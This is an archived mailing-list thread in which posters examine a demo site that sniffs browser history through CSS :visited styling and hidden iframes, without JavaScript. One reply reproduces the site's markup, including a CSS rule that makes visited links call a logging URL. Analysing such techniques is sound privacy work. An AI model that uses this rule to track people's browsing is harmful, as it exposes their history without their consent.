[Author Prev][Author Next][Thread Prev][Thread Next][Author Index][Thread Index]
RE: Stealing browser history without JavaScript
>>>> Matej Kovacic wrote:
>>>>
>>>> Hi,
>>>>
>>>> this seems an interesting issue:
>>>>
>>>> http://www.making-the-web.com/misc/sites-you-visit/nojs/
>>>>
>>>> bye, Matej
>>>Anon Mus Wrote:
>>> Been to this site and it dont work on my firefox.3.0.8 browser... (with
>>> NoScript, QuickJava, Better Privacy, JavaScript Deobfuscator, Quick
>>> Preference Button & User Agent Switcher)
>>>
>>> it replies with a 0 (zero) count. But there should be dozens.
>> Zinco Wrote:
>> Seems to me it would have to have all websites known to man on the page
it
>> loads. If it looks at "visited links" css on the page it loads it could
>> only look at websites on that page. It would have to store a lot of web
>> pages on that hidden i-frame to really compare. Unless you are looking
to
>> see if a particular person visited a particular page doesn't seem like it
>> would do anyone much good.
>>
>Anon Mus Wrote:
>Maybe IFrames don't work on Firefox. The pages IFrame message "Please
>enable Iframes, though" is superfluous, as it only prints if IFrames is
>functional !!
>Reminds me of a security software con site years ago which would print
>some detail value known only to your browser, up on a web page. Of
>course, only YOU could see it, no data was sent to the visited web site.
>Even though it was a con, lots of people bought the security software
>to protect themselves from that non-existent leak.
>In this IFrames exploit the test web page is said to have a css
>background image embedded in it. I can find no such image (background:
>#003399;).
>(See http://www.w3schools.com/css/pr_background.asp.)
>The only image on the page is a javascript button. But there is a
>javascript dependent Google Analytics urchin tracker.
>Would the author Brendon Bo[mb]shell like to identify him/her self?
Zinco Wrote:
50000 pages isn't very much. Would have to contain millions it would seem.
It did work on my browser and found 30 of the most popular sites. Ebay ect.
*************************
Index.php I-Frame
<iframe src="start_scan.php?769245844" width="300" height="260"
frameborder="0" scrolling="no">Please enable Iframes, though</iframe>
<p><!-- AddThis Button BEGIN -->
<!-- AddThis Button END -->
<script type="text/javascript">
digg_skin = 'compact';
digg_window = 'new';
</script>
<script src="http://digg.com/tools/diggthis.js"
type="text/javascript"></script>
<script type="text/javascript"
src="http://www.reddit.com/button.js?t=1"></script>
</p>
*******************************
Start_scan.php I-frame
<iframe src="sites_list.php?sess=fe728e" width="288" height="210"
frameborder="0"></iframe>
</div>
<iframe src="base.php?sess=fe728e" width="1" height="1"
frameborder="0"></iframe>
**********************************
Base.php
<style type="text/css">#l2001
a:visited{background:url(log_base.php?id=2001&sess=fe728e);}
***************************